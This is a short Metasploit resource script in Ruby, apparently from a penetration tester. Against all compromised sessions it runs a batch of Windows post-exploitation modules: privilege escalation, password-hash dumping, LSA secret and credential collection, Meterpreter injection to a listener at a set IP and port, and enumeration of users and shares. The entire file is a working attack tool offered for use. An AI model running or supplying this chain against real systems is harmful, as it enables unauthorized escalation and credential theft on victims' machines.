#######################################################
# Created by me
# Uses mubix's run_all_post.rc resource file to run multiple
# post exploitation scripts against all sessions.
# Created: 15 September 2014    Edited: 15 September 2014
# Version 1.0
#######################################################
 
<ruby>
 
lhost = "172.16.236.137"
lport = "443"
 
### These are the post exploitation scripts which will be ran.
posts = ["post/windows/escalate/getsystem",
"post/windows/manage/smart_migrate",
"post/windows/gather/smart_hashdump",
"post/windows/gather/lsa_secrets",
"post/windows/gather/credentials/credential_collector",
"post/windows/manage/multi_meterpreter_inject",
"post/windows/gather/dumplinks",
"post/windows/gather/enum_applications",
"post/windows/gather/enum_logged_on_users",
"post/windows/gather/enum_shares"
]
 
 
### Sets global variables
run_single("setg LHOST #{lhost}")
run_single("setg LPORT #{lport}")
 
posts.each do|d|
        print_line("running #{d}")
        run_single("use #{d}")
        run_single("resource /usr/share/metasploit-framework/scripts/resource/run_all_post.rc")
end
       
 
</ruby>
